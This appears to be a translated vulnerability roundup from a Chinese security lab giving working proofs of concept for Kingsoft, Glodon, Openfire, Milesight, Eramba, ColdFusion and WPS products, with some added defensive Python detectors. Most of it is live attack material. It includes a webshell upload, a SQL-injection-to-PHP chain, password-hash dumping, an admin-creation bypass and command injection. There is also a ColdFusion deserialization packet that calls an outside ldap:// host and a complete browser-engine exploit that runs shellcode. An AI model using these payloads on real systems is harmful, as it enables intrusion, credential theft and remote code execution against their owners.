0x01 Notice
The technical articles of Caesar Security Lab (凯撒安全实验室) are for reference only. The information in this article is provided solely so that security personnel can test or maintain the websites, servers and other systems (including but not limited to these) for which they are responsible. Do not use the technical material in this article to intrude into any computer system without authorization. The user alone bears responsibility for any direct or indirect consequences and losses caused by using the information provided here. The tools provided in this article are for learning only; any other use is prohibited!!!
0x02 Vulnerability list
Kingsoft Terminal Security System V9 arbitrary file upload vulnerability
The toolFileName field carries a path traversal (../../datav.php) that decides where the uploaded toolImage part is written; the part itself is a PHP webshell (rebeyond / Behinder style, default key e45e329feb5d925b) sent with an image Content-Type.

POST /inter/software_relation.php HTTP/1.1
Host: 192.168.249.137:6868
Content-Length: 1557
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://192.168.249.137:6868
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxRP5VjBKdqBrCixM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolFileName"

../../datav.php
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolDescri"


------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="version"


------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="sofe_typeof"


------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="fileSize"


------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="param"


------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolName"


------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolImage"; filename="3.php"
Content-Type: image/png

<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
    $t="base64_"."decode";
    $post=$t($post."");
    for($i=0;$i<strlen($post);$i++) {
        $post[$i] = $post[$i]^$key[$i+1&15];
    }
}
else
{
    $post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
------WebKitFormBoundaryxRP5VjBKdqBrCixM--
Kingsoft EDR code execution vulnerability
Step 1: enable the MySQL general log. The id parameter handled by /Console/inter/handler/change_white_list_cmd.php is injectable; /**/ stands in for whitespace.

POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
Host: 192.168.24.3:6868
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 131
Origin: http://192.168.24.3:6868
Connection: close
Referer: http://192.168.24.3:6868/settings/system/user.php?m1=7&m2=0

{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log=on;","type":"0"}}

Step 2: point the general log at a PHP file under the web root. The hex literal decodes to ../../Console/check_login2.php.

POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
Host: 192.168.24.3:6868
Content-Length: 195
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.24.3:6868
Referer: http://192.168.24.3:6868/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7
Connection: close

{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870;","type":"0"}}

Step 3: write PHP code. The value is logged verbatim as part of the query text, so it lands in check_login2.php.

POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1
Host: 192.168.24.3:6868
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 222
Origin: http://192.168.24.3:6868
Connection: close
Referer: http://192.168.24.3:6868/index.php

{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}

Step 4: finally, a GET request triggers the RCE: http://192.168.24.3:6868/check_login2.php
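The three requests above chain a SQL injection into a MySQL general_log write of attacker-controlled PHP. The Python below is an added example, not code from the original page or from Kingsoft: it decodes the 0x... literal from step 2, strips the /**/ comments that stand in for whitespace, and classifies the id value so a defender can spot the technique in captured request bodies. The sample bodies are copied from the requests above; the detection rules and labels are my own.

```python
import json
import re

# Copied from the page's second request: MySQL treats 0x... as a string literal.
PAGE_LOG_FILE_HEX = "0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870"

# Constructed sample bodies: the first two are steps 1 and 2 above, the third is a benign call.
SAMPLE_BODIES = [
    '{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A",'
    '"id":"111;set/**/global/**/general_log=on;","type":"0"}}',
    '{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A",'
    '"id":"111;set/**/global/**/general_log_file=' + PAGE_LOG_FILE_HEX + ';","type":"0"}}',
    '{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A",'
    '"id":"111","type":"0"}}',
]


def decode_mysql_hex_literal(literal: str) -> str:
    """Decode a MySQL 0x... hexadecimal literal into the text it stands for."""
    if not literal.lower().startswith("0x") or len(literal) % 2:
        raise ValueError("not a MySQL hex literal")
    return bytes.fromhex(literal[2:]).decode("utf-8")


def normalize_sql(fragment: str) -> str:
    """Replace /**/ inline comments with spaces, collapse whitespace and lower-case."""
    fragment = re.sub(r"/\*.*?\*/", " ", fragment, flags=re.S)
    return re.sub(r"\s+", " ", fragment).strip().lower()


# Matches 'set [global] general_log=' and 'set [global] general_log_file='.
LOG_ABUSE = re.compile(r"\bset\s+(?:global\s+)?general_log(_file)?\s*=")


def classify_id(value: str) -> str:
    """'clean' for a bare number, otherwise a label describing the injected SQL."""
    if re.fullmatch(r"\d+", value.strip()):
        return "clean"
    sql = normalize_sql(value)
    m = LOG_ABUSE.search(sql)
    if m is None:
        return "suspicious"  # non-numeric id, but not the general_log technique
    if m.group(1):  # general_log_file=... : show where the log is being redirected
        hexes = re.findall(r"0x[0-9a-f]+", sql[m.end():])
        target = decode_mysql_hex_literal(hexes[0]) if hexes else "?"
        return f"general_log_file -> {target}"
    return "general_log on"


def scan_body(body: str) -> str:
    """Pull change_white_list_cmd.id out of a captured JSON body and classify it."""
    try:
        value = json.loads(body)["change_white_list_cmd"]["id"]
    except (ValueError, KeyError, TypeError):
        return "not a change_white_list_cmd body"
    return classify_id(str(value))


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(scan_body(body))
```

The general_log_file label is the one worth alerting on: a log path that ends in .php and sits under the web root is the whole attack, and MySQL will happily create it as long as the server process can write there.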
Glodon Linkworks GetIMDictionary SQL injection

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

Openfire authentication bypass vulnerability

GET /user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............ HTTP/1.1
Milesight VPN server.js arbitrary file read vulnerability

GET /../etc/passwd HTTP/1.1
Host: 
Accept: */*
Content-Type: application/x-www-form-urlencoded

Eramba arbitrary code execution vulnerability
The path parameter is used as the command name of the wkhtmltopdf invocation shown in the error title, so ip a; runs first and the rest of the line (--dpi ...) fails with exit status 127; the command output comes back in the error page.

GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1
Host: [redacted]
Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://[redacted]/settings
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Response:

HTTP/1.1 500 Internal Server Error
Date: Fri, 31 Mar 2023 12:37:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Access-Control-Allow-Origin: *
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Disposition: attachment; filename="test.pdf"
X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2033469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Error: The exit status code '127' says something went wrong:
stderr: "sh: 1: --dpi: not found"
stdout: "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether [redacted] brd ff:ff:ff:ff:ff:ff
    inet [redacted] brd [redacted] scope global ens33
       valid_lft forever preferred_lft forever
    inet6 [redacted] scope link
       valid_lft forever preferred_lft forever"
command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0' --margin-right '0' --margin-top '0' --orientation 'Landscape' --javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html' '/tmp/knp_snappy6426d423104587.46971034.pdf'.</title>
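The error title above shows the shape of the bug: a user-controlled binary path is concatenated in front of the wkhtmltopdf options and the whole string is handed to /bin/sh. The Python below is an added example, not Eramba's code: it rebuilds that shell line from the option list in the error message, reproduces the exit status 127 with a harmless echo in place of ip a, and shows the hardened form (validate the path, then exec an argv list with no shell). The argument list is copied from the page; the validation rules and file names are assumptions.

```python
import shutil
import subprocess

# Option list reconstructed from the "command:" line in the error page above.
WKHTMLTOPDF_ARGS = ["--dpi", "90", "--lowquality",
                    "--margin-bottom", "0", "--margin-left", "0",
                    "--margin-right", "0", "--margin-top", "0",
                    "--orientation", "Landscape", "--javascript-delay", "1000"]

# Characters that give a string meaning to /bin/sh; none of them belong in a program path.
SHELL_META = set(";|&$`<>(){}[]*?~\\\"'") | set(" \t\n\r")


def build_shell_line(binary_path: str, html_in: str, pdf_out: str) -> str:
    """Vulnerable pattern: the configured binary path is pasted unquoted before the options."""
    opts = " ".join(a if a.startswith("--") else f"'{a}'" for a in WKHTMLTOPDF_ARGS)
    return f"{binary_path} {opts} '{html_in}' '{pdf_out}'"


def run_vulnerable(binary_path: str, html_in="/tmp/in.html", pdf_out="/tmp/out.pdf"):
    """Runs the line through the shell, so 'ip a;' (or 'echo INJECTED;') executes first
    and the leftover '--dpi ...' is looked up as a command and fails with status 127."""
    return subprocess.run(build_shell_line(binary_path, html_in, pdf_out),
                          shell=True, capture_output=True, text=True)


def validate_binary_path(binary_path: str) -> str:
    """Accept only a metacharacter-free name or path that resolves to an executable."""
    if not binary_path or any(c in SHELL_META for c in binary_path):
        raise ValueError(f"rejected binary path: {binary_path!r}")
    resolved = shutil.which(binary_path)
    if resolved is None:
        raise FileNotFoundError(binary_path)
    return resolved


def run_safe(binary_path: str, html_in="/tmp/in.html", pdf_out="/tmp/out.pdf"):
    """Hardened form: validated path, argv list, no shell in between."""
    argv = [validate_binary_path(binary_path), *WKHTMLTOPDF_ARGS, html_in, pdf_out]
    return subprocess.run(argv, capture_output=True, text=True)


def safe_rejects(binary_path: str) -> bool:
    """True when the hardened runner refuses the path."""
    try:
        validate_binary_path(binary_path)
    except (ValueError, FileNotFoundError):
        return True
    return False


if __name__ == "__main__":
    r = run_vulnerable("echo INJECTED;")
    print("vulnerable:", r.returncode, r.stdout.strip(), r.stderr.strip())
    print("hardened rejects injection:", safe_rejects("echo INJECTED;"))
```

With the argv form the value of path can only ever be the program that is executed; whatever it contains is passed to execve as a single string and never reinterpreted. The remaining risk is that the setting itself is reachable from the web UI, so restricting who may change it matters as much as the quoting.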
Adobe ColdFusion deserialization vulnerability
CVE ID
CVE-2023-29300
POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
Host: 1.2.3.4:1234
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 400
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
cmd: id

argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://xxx.xxx.xxx:1234/Basic/TomcatEcho</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>
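The packet above abuses the struct type attribute to ask the WDDX deserializer for a Java class, and feeds that class a JNDI-style ldap:// URL. The Python below is an added example, not Adobe's code and not the actual ColdFusion fix: it parses a WDDX packet and rejects typed structs and remote-lookup strings, which is the check a WAF rule or an input filter in front of the endpoint can apply. The page packet is embedded exactly as printed (type value included); the benign packet and the scheme list are my own.

```python
import xml.etree.ElementTree as ET

# Constructed samples: the packet from the request above, and a plain packet with no type attribute.
PAGE_PACKET = ("<wddxPacket version='1.0'><header/><data>"
               "<struct type='xcom.sun.rowset.JdbcRowSetImplx'>"
               "<var name='dataSourceName'><string>ldap://xxx.xxx.xxx:1234/Basic/TomcatEcho</string></var>"
               "<var name='autoCommit'><boolean value='true'/></var>"
               "</struct></data></wddxPacket>")
BENIGN_PACKET = ("<wddxPacket version='1.0'><header/><data><struct>"
                 "<var name='name'><string>alice</string></var>"
                 "<var name='age'><number>42</number></var>"
                 "</struct></data></wddxPacket>")

# URL schemes that make a deserialized bean reach out to an attacker-controlled server.
REMOTE_SCHEMES = ("ldap://", "ldaps://", "rmi://", "iiop://", "dns://")


def typed_struct_classes(packet: str) -> list:
    """Class names requested via struct type='...' (a plain WDDX struct has no type)."""
    root = ET.fromstring(packet)
    return [el.get("type") for el in root.iter("struct") if el.get("type")]


def remote_references(packet: str) -> list:
    """String values that look like remote lookups, e.g. ldap:// URLs."""
    root = ET.fromstring(packet)
    return [s.text for s in root.iter("string")
            if s.text and s.text.strip().lower().startswith(REMOTE_SCHEMES)]


def check_wddx_packet(packet: str, allowed_classes=frozenset()) -> None:
    """Raise ValueError if the packet names a class outside the allowlist or carries a remote reference."""
    classes = [c for c in typed_struct_classes(packet) if c not in allowed_classes]
    if classes:
        raise ValueError(f"typed WDDX struct not allowed: {classes}")
    refs = remote_references(packet)
    if refs:
        raise ValueError(f"remote reference in WDDX packet: {refs}")


def is_safe_packet(packet: str) -> bool:
    """Boolean wrapper for filters that only need accept/reject."""
    try:
        check_wddx_packet(packet)
    except (ValueError, ET.ParseError):
        return False
    return True


if __name__ == "__main__":
    print("page packet:", typed_struct_classes(PAGE_PACKET), remote_references(PAGE_PACKET))
    print("page packet accepted:", is_safe_packet(PAGE_PACKET))
    print("benign packet accepted:", is_safe_packet(BENIGN_PACKET))
```

An empty allowlist is the right default: application data never needs a struct to name a Java class, so any type attribute at all is a reason to drop the request before it reaches the deserializer.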
1Panel loadfile authenticated (back-end) file read vulnerability

POST /api/v1/file/loadfile
{"path":"/etc/passwd"}
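Three entries on this page are the same bug class: a client-supplied path that is joined onto a directory and never checked against it (toolFileName ../../datav.php in the Kingsoft upload, /../etc/passwd against the Milesight VPN server.js, and the 1Panel loadfile path). The Python below is an added example, not code from any of those products: one containment check for read paths and one name check for uploads, run against the exact inputs from the page. The base directories and the allowed image extensions are assumptions.

```python
import posixpath

# Hypothetical base directories for the example (assumptions, not the products' real layouts).
UPLOAD_ROOT = "/var/www/html/uploads"
READ_ROOT = "/var/www/html/public"
ALLOWED_UPLOAD_EXT = {".png", ".jpg", ".jpeg", ".gif"}


def safe_join(base: str, user_path: str) -> str:
    """Map a client-supplied path under base; refuse NUL bytes and anything that
    normalizes outside base. Absolute paths are treated as relative to base.
    This is a lexical check: on a live filesystem follow it with os.path.realpath()
    on the result so a symlink inside base cannot point back out."""
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, user_path.lstrip("/")))
    if candidate != base and not candidate.startswith(base + "/"):
        raise ValueError(f"path escapes base: {user_path!r}")
    return candidate


def is_contained(base: str, user_path: str) -> bool:
    """Boolean wrapper around safe_join."""
    try:
        safe_join(base, user_path)
    except ValueError:
        return False
    return True


def accept_upload_name(name: str) -> str:
    """Validate an upload name: a bare file name (no directory part, no dotfile)
    with an allowed image extension, then place it under UPLOAD_ROOT."""
    leaf = posixpath.basename(name)
    if not leaf or leaf != name or leaf.startswith("."):
        raise ValueError(f"file name must be a bare name: {name!r}")
    if posixpath.splitext(leaf)[1].lower() not in ALLOWED_UPLOAD_EXT:
        raise ValueError(f"extension not allowed: {name!r}")
    return safe_join(UPLOAD_ROOT, leaf)


def upload_name_ok(name: str) -> bool:
    """Boolean wrapper around accept_upload_name."""
    try:
        accept_upload_name(name)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    for p in ("css/app.css", "/etc/passwd", "/../etc/passwd", "../../../etc/passwd"):
        print(f"read {p!r}: contained={is_contained(READ_ROOT, p)}")
    for n in ("../../datav.php", "3.php", "3.png"):
        print(f"upload {n!r}: ok={upload_name_ok(n)}")
```

Note what the read check does with /etc/passwd: it is not rejected, it is mapped to /var/www/html/public/etc/passwd, which is the correct behaviour for a file-serving endpoint. Only the traversal variants are refused, which is the difference between the Milesight request and a legitimate one.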
Kingsoft WPS RCE
Affected versions:
WPS Office 2023 Personal Edition < 11.1.0.15120
WPS Office 2019 Enterprise Edition < 11.8.2.12085
PoC notes:
Start an HTTP server listening on port 80 in the directory that contains 1.html, and add the hosts entry 127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn. Triggering the bug requires a host name that satisfies the rule clientweb.docer.wps.cn.{xxx}wps.cn; cloudwps.cn has nothing to do with wps.cn, yet it satisfies the rule.
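The host rule above is a classic allowlist mistake: a prefix-plus-suffix match that ignores label boundaries, so any registrable domain ending in the letters wps.cn passes. The Python below is an added example, not WPS code: the lax check is my reconstruction of the rule exactly as the page states it (an assumption about its form, not the product's real implementation), and the strict check is the label-boundary comparison that rejects the PoC host while still accepting the genuine one. The URLs other than the PoC host are constructed.

```python
import re
from urllib.parse import urlsplit

ALLOWED_HOST = "clientweb.docer.wps.cn"
TRUSTED_ZONE = "wps.cn"


def hostname_of(url: str) -> str:
    """Host part of a URL, lower-cased, port and trailing dot removed."""
    host = urlsplit(url).hostname or ""
    return host.lower().rstrip(".")


def lax_host_check(url: str) -> bool:
    """Rule as the page states it: clientweb.docer.wps.cn, or clientweb.docer.wps.cn.{xxx}wps.cn.
    Assumption about the rule's shape, not the actual WPS code."""
    return re.fullmatch(r"clientweb\.docer\.wps\.cn(\..*wps\.cn)?", hostname_of(url)) is not None


def strict_host_check(url: str) -> bool:
    """Label-boundary check: the exact allowed host, or a host whose suffix is '.wps.cn'.
    'cloudwps.cn' does not end in '.wps.cn', so the PoC host is refused."""
    host = hostname_of(url)
    if host == ALLOWED_HOST:
        return True
    return host == TRUSTED_ZONE or host.endswith("." + TRUSTED_ZONE)


if __name__ == "__main__":
    for url in ("https://clientweb.docer.wps.cn/",
                "http://clientweb.docer.wps.cn.cloudwps.cn/1.html",
                "http://clientweb.docer.wps.cn.attacker.example/"):
        print(f"{url}: lax={lax_host_check(url)} strict={strict_host_check(url)}")
```

Even the strict version trusts every name under wps.cn; an allowlist of exact hosts is the safer choice where the set of legitimate endpoints is small, and either way the decision must be made on the parsed hostname, never on a substring of the raw URL.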
Key code
<script>
if (typeof alert === "undefined") { alert = console.log; }

let f64 = new Float64Array(1);
let u32 = new Uint32Array(f64.buffer);
function d2u(v) { f64[0] = v; return u32; }
function u2d(lo, hi) { u32[0] = lo; u32[1] = hi; return f64[0]; }

function gc() { // major
  for (let i = 0; i < 0x10; i++) { new Array(0x100000); }
}

function foo(bug) {
  function C(z) {
    Error.prepareStackTrace = function (t, B) { return B[z].getThis(); };
    let p = Error().stack;
    Error.prepareStackTrace = null;
    return p;
  }
  function J() {}
  var optim = false;
  var opt = new Function('a', 'b', 'c',
    'if(typeof a==="number"){if(a>2){for(var i=0;i<100;i++);return;}b.d(a,b,1);return}' +
    'g++;'.repeat(70));
  var e = null;
  J.prototype.d = new Function('a', 'b', '"use strict";b.a.call(arguments,b);return arguments[a];');
  J.prototype.a = new Function('a', 'a.b(0,a)');
  J.prototype.b = new Function('a', 'b', 'b.c();if(a){' + 'g++;'.repeat(70) + '}');
  J.prototype.c = function () {
    if (optim) {
      var z = C(3);
      var p = C(3);
      z[0] = 0;
      e = { M: z, C: p };
    }
  };
  var a = new J();
  // jit optim
  if (bug) {
    for (var V = 0; 1E4 > V; V++) { opt(0 == V % 4 ? 1 : 4, a, 1); }
  }
  optim = true;
  opt(1, a, 1);
  return e;
}

e1 = foo(false);
e2 = foo(true);
delete e2.M[0];
let hole = e2.C[0];

let map = new Map();
map.set('asd', 8);
map.set(hole, 0x8);
map.delete(hole);
map.delete(hole);
map.delete("asd");
map.set(0x20, "aaaa");

let arr3 = new Array(0);
let arr4 = new Array(0);
let arr5 = new Array(1);
let oob_array = [];
oob_array.push(1.1);
map.set("1", -1);

let obj_array = { m: 1337, target: gc };
let ab = new ArrayBuffer(1337);

let object_idx = undefined;
let object_idx_flag = undefined;
let max_size = 0x1000;
for (let i = 0; i < max_size; i++) {
  if (d2u(oob_array[i])[0] === 0xa72) { object_idx = i; object_idx_flag = 1; break; }
  if (d2u(oob_array[i])[1] === 0xa72) { object_idx = i + 1; object_idx_flag = 0; break; }
}

function addrof(obj_para) {
  obj_array.target = obj_para;
  let addr = d2u(oob_array[object_idx])[object_idx_flag] - 1;
  obj_array.target = gc;
  return addr;
}

function fakeobj(addr) {
  let r8 = d2u(oob_array[object_idx]);
  if (object_idx_flag === 0) { oob_array[object_idx] = u2d(addr, r8[1]); }
  else { oob_array[object_idx] = u2d(r8[0], addr); }
  return obj_array.target;
}

let bk_idx = undefined;
let bk_idx_flag = undefined;
for (let i = 0; i < max_size; i++) {
  if (d2u(oob_array[i])[0] === 1337) { bk_idx = i; bk_idx_flag = 1; break; }
  if (d2u(oob_array[i])[1] === 1337) { bk_idx = i + 1; bk_idx_flag = 0; break; }
}

let dv = new DataView(ab);

function get_32(addr) {
  let r8 = d2u(oob_array[bk_idx]);
  if (bk_idx_flag === 0) { oob_array[bk_idx] = u2d(addr, r8[1]); }
  else { oob_array[bk_idx] = u2d(r8[0], addr); }
  let val = dv.getUint32(0, true);
  oob_array[bk_idx] = u2d(r8[0], r8[1]);
  return val;
}

function set_32(addr, val) {
  let r8 = d2u(oob_array[bk_idx]);
  if (bk_idx_flag === 0) { oob_array[bk_idx] = u2d(addr, r8[1]); }
  else { oob_array[bk_idx] = u2d(r8[0], addr); }
  dv.setUint32(0, val, true);
  oob_array[bk_idx] = u2d(r8[0], r8[1]);
}

function write8(addr, val) {
  let r8 = d2u(oob_array[bk_idx]);
  if (bk_idx_flag === 0) { oob_array[bk_idx] = u2d(addr, r8[1]); }
  else { oob_array[bk_idx] = u2d(r8[0], addr); }
  dv.setUint8(0, val);
}

let fake_length = get_32(addrof(oob_array) + 12);
set_32(get_32(addrof(oob_array) + 8) + 4, fake_length);

let wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
let wasm_mod = new WebAssembly.Module(wasm_code);
let wasm_instance = new WebAssembly.Instance(wasm_mod);
let f = wasm_instance.exports.main;
let target_addr = addrof(wasm_instance) + 0x40;
let rwx_mem = get_32(target_addr);
//alert("rwx_mem is " + rwx_mem.toString(16));

const shellcode = new Uint8Array([
  0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30,
  0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,
  0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52,
  0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01, 0xd1,
  0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b,
  0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03,
  0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b,
  0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24,
  0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb,
  0x8d, 0x5d, 0x6a, 0x01, 0x8d, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x50, 0x68, 0x31, 0x8b, 0x6f,
  0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5,
  0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a,
  0x00, 0x53, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x00]);

for (let i = 0; i < shellcode.length; i++) { write8(rwx_mem + i, shellcode[i]); }
f();
</script>
Tongda
Tongda OA SQL injection vulnerability CVE-2023-4165 POC
Tongda OA SQL injection vulnerability CVE-2023-4166 POC
Weaver
Weaver E-Office 9 file upload vulnerability CVE-2023-2648 POC
Weaver E-Office 9 file upload vulnerability CVE-2023-2523 POC
Weaver E-Office 9 unauthenticated (front-end) file inclusion
Sangfor
Sangfor Application Delivery system command execution vulnerability POC
Sangfor reporting system arbitrary file read
Glodon
Glodon OA SQL injection vulnerability POC
Glodon OA authenticated (back-end) file upload vulnerability POC
海康
HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POC
